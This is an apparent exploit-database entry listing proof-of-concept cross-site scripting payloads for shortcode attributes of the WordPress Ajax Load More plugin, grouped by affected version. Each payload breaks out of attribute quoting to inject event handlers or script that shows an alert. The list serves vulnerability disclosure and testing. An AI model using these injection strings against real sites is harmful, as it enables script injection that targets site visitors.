Share
## https://sploitus.com/exploit?id=WPEX-ID:497D0BF9-B750-4293-9662-1722A74442E2
Examples (a lot of attributes are affected!, not just the ones below)

v < 5.6.0.3
[ajax_load_more id='" onmouseover="alert(/XSS-id-1/)"']
[ajax_load_more id='2" src onerror=alert(/XSSid-2/)//']
[ajax_load_more id='a = 1;alert(/XSSid-3/); var b']

[ajax_load_more button_label='"onmouseover=alert(/XSS-button_label/)//']
[ajax_load_more button_loading_label='"onmouseover=alert(/XSS-button_loading_label/)//']
[ajax_load_more button_done_label='"onmouseover=alert(/XSS-button_done_label/)//']

v < 5.6.0.1
[ajax_load_more max_pages='"onmouseover=alert(/XSS-max_pages/)//']

v < 5.6.0
[ajax_load_more repeater='" onmouseover="alert(/XSS/)"']
[ajax_load_more theme_repeater='" onmouseover="alert(/XSS/)"']
[ajax_load_more tag='" onmouseover="alert(/XSS/)"']

v < 5.5.5 (original from submitter)
[ajax_load_more css_classes='" onmouseover="alert(/XSS/)"']